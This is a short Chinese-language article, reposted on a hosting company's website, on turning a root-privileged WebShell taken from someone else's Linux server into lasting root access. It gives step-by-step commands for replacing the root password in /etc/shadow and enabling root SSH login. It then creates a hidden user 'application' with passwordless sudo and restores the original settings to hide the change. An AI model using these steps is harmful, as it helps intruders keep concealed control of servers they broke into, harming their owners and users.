快速业务通道

linux提权 Root权限WebShell提权

作者 佚名技术 来源 Linux系统 浏览 发布时间 2012-04-15

  没啥技术含量,一种思路,让某些得到Root权限WebShell的同学可以快点拿到权限.

  某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat程序是Root身份启动的,WebShell当然也拥有Root权限.

  具体提权思路:

  1.WebShell直接替换Root密码:/etc/shadow //记得备份

  2.允许Root通过ssh登陆:

  修改:/etc/ssh/sshd_config

  PermitRootLogin yes #允许Root登陆

  3.重启ssh服务:service ssh restart

  4.以Root身份登陆ssh,增加一个用户:

  useradd application

  passwd //根据提示设置密码

  5.更改application用户运行su不需密码:

  chmod w /etc/sudoers //增加写入权限,默认只读

  修改:/etc/sudoers

  vi /etc/sudoers

  加入:application ALL=(ALL) NOPASSWD: ALL

  6.把Root密码修改回原样,禁止Root登陆.并去除sudoers的写属性(chmod -w /etc/sudoers).

  7.当然还要:chmod -w /etc/sudoers


Root用户登陆.


普通用户登陆,su免密码进入Root权限.

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号